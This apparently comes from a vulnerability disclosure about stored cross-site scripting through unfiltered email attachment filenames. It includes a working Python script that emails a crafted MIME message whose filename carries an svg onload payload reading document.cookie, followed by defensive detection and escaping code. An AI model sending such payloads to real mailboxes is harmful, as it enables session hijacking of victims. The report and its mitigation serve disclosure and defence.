### Brief description:

Another instance.

### Detailed description:

The attachment filename is not filtered, so it can trigger XSS.

Assume the attacker is attack@attack.com and the victim is victim@victim.com.

```python
import smtplib

sender = 'attack@attack.com'
receiver = 'victim@victim.com'

# Raw MIME message as sent by the PoC. Note that the inner multipart/alternative
# reuses the outer boundary string; a strict parser may reject this, but it is
# kept as in the original report.
message = """From: <test> <attack@attack.com>
To: <test> <victim@victim.com>
Subject: Test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="YOUAREUNDERATTACK"

--YOUAREUNDERATTACK
Content-Type: multipart/alternative; boundary="YOUAREUNDERATTACK"

--YOUAREUNDERATTACK
Content-Type: text/plain; charset=GBK
Content-Transfer-Encoding: base64

IFlvdSBhcmUgdW5kZXIgYXR0YWNrLgoKCg==

--YOUAREUNDERATTACK
Content-Type: text/html; charset=GBK
Content-Transfer-Encoding: base64

PGRpdiBzdHlsZT0ibGluZS1oZWlnaHQ6MS43O2NvbG9yOiMwMDAwMDA7Zm9udC1zaXplOjE0cHg7
Zm9udC1mYW1pbHk6YXJpYWwiPjxkaXYgc3R5bGU9ImxpbmUtaGVpZ2h0OjEuNztjb2xvcjojMDAw
MDAwO2ZvbnQtc2l6ZToxNHB4O2ZvbnQtZmFtaWx5OmFyaWFsIj4mbmJzcDtZb3UgYXJlIHVuZGVy
IGF0dGFjay48L2Rpdj48YnI+PGJyPjxzcGFuIHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBp
ZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9zcGFuPjwvc3Bhbj48L2Rpdj48YnI+PGJyPjxzcGFu
IHRpdGxlPSJuZXRlYXNlZm9vdGVyIj48c3BhbiBpZD0ibmV0ZWFzZV9tYWlsX2Zvb3RlciI+PC9z
cGFuPjwvc3Bhbj4=

--YOUAREUNDERATTACK--

--YOUAREUNDERATTACK
Content-Type: text/plain; name="filename.txt<svg onload=alert(document.cookie)>"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="filename.txt<svg onload=alert(document.cookie)>"

Q29kZSBpcyBwb2V0cnku

--YOUAREUNDERATTACK--
"""

try:
    smtpObj = smtplib.SMTP('smtp.attack.com')
    smtpObj.login('attack', 'password')
    smtpObj.sendmail(sender, receiver, message)
    print("Successfully sent email")
except Exception:
    print("Error: unable to send email")
```

### Proof of vulnerability:

![4.png](https://images.seebug.org/upload/201406/202115530eb114a57d493f32a5293ba9d018c6e5.png)
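As an added example (not part of the original report), the defender-side counterpart: parse an incoming message with Python's `email` module, flag attachment names carrying HTML metacharacters, and escape the name before it is interpolated into the mailbox UI, which is the step the vulnerable client skipped. The message bytes below are constructed here and reuse the report's filename.

```python
import email
import html
from email import policy

# Constructed sample message shaped like the report's PoC: one text part and
# one attachment whose filename carries HTML markup.
RAW_MESSAGE = b"""From: attack@attack.com
To: victim@victim.com
Subject: Test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

hello
--b1
Content-Type: text/plain; name="filename.txt<svg onload=alert(document.cookie)>"
Content-Disposition: attachment; filename="filename.txt<svg onload=alert(document.cookie)>"
Content-Transfer-Encoding: base64

Q29kZSBpcyBwb2V0cnku
--b1--
"""

# Characters that have no place in an attachment name but change meaning in HTML.
SUSPICIOUS = set('<>"\'&')


def attachment_filenames(raw: bytes) -> list:
    """Return the filename of every attachment part, as the email parser sees it."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    names = []
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            names.append(part.get_filename() or "")
    return names


def is_suspicious(name: str) -> bool:
    """Detection rule: flag names containing HTML metacharacters for review."""
    return any(ch in SUSPICIOUS for ch in name)


def render_attachment_link(name: str) -> str:
    """Mitigation: escape the name before it is placed into HTML output."""
    return '<a class="attachment">%s</a>' % html.escape(name, quote=True)
```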